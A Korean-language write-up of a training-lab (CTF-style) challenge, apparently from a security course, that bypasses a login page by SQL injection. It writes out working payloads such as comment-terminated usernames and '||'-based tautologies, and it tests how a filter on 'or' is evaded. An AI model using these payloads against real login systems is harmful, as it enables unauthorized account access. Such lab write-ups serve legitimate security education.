[SegFault] (Authentication Bypass) - Login Bypass 2

[SegFault] Authentication Bypass (Login)

Login Bypass 2.

normaltic2 로 로그인하자!

 

문제 파악

• 위의 페이지에 접속하면 아래와 같은 화면이 나온다.
• 알고 있는 계정 :  [ID/PW] : doldol / dol1234

• Burp Suite을 이용하여 사이트 접속 과정의 상태코드(Status code) 확인한다.
  
  • 200 OK
• 로그인 과정의 구조를 알기 위해, 우선 알고 있는 정보로 로그인 해본다.

• 로그인 과정의 히스토리(HTTP history), 상태코드(Status code) 확인한다.
  • 302 Found
  • 200 OK

• 요청(Request)을 살펴보자 !

• /login2/login.php 경로에 post메서드로 파라미터 UserId=doldol&Password=dol1234&Submit=Login 들어가는 것을 확인할 수 있다.
• 로그인이 성공하여 index.php로 리디렉션되는 것을 볼 수 있다.

---

생각 과정

생각 과정
1. SQL Injection이 가능한가? Yes
-> doldol' and '1'='1 / dol1234 로 로그인 시도 : 성공
2. 어떤 로직으로 이루어져 있을까?
  2-1. 식별/인증 동시 normaltic2'or'1'='1/ 아무거나 시도 :실패(Fail)
  2-2. or 필터링?! normaltic2'# / 아무거나 시도

---

풀이 과정 (해결 방안)

• or 에 대한 필터링이라고 생각하고 normaltic2'#으로 로그인이 가능했다.
• 하지만 or 가 어떤식으로 필터링 되어 있는지를 생각해보는 것이 중요하기 때문에 다음과 같이 테스트 해보았다.

 

or 필터링 테스트

예측 가능한 필터링

' or ' 이 필터링 된다고 생각하면
normaltic' or '1' -> normaltic1' 가 된다.
'or 이 필터링 된다고 생각하면
normaltic' or'1' -> normaltic' 1 가 되어 안된다.
or' 이 필터링 된다고 생각하면
normaltic'or '1' -> normaltic '1 가 되어 안된다.
'or' 이 필터링 된다고 생각하면
normaltic'or'1' -> normaltic1' 이 되어 되야한다.

테스트 해보면 아래와 같다.

' or ' (앞공백O뒷공백X)
normaltic' or'1' = '1'# 실패
'or ' (앞공백X뒷공백O)
normaltic'or '1' = '1'# 실패
'or' (공백 없음)
normaltic'or'1' = '1'#
' or ' (앞뒤 공백)
normaltic' or '1' = '1'# normaltic1으로 성공

• 즉 앞뒤 공백이 있는 경우만 뒤의 숫자가 제대로 붙어서 이어짐을 알 수 있다.
• 위의 결과를 바탕으로 생각해보면?

다른 풀이법

• normaltic' or '2' = '1'# 을 넣었을때 normaltic2로 로그인되어 이 방법으로도 풀 수 있음을 알 수 있다.

또한 이 문제의 필터링은 문자 or을 필터링 한것이기 때문에

• normaltic2'||'1'='1 로 normaltic2로 로그인이 가능했다.
• || 이라는 or 연산자에 대해서는 안막혀 였다는 것을 확인할 수 있었다.

---

생각해볼 점

전체 조회가 되는 경우
normaltic1' = '0'#
normaltic1' = False#

normaltic1으로 로그인되는 경우
normaltic1' = True#
normaltic1'#

• 식별과 인증이 동시에 되는 경우에 '# 을 통해서 password 부분을 주석처리 해준다.
• 앞의 id 부분만 이용하여 참, 거짓에 따라 조회되는 정보가 다름을 알 수 있다.

---

질문 환영, 수정 및 보완에 대한 지적 환영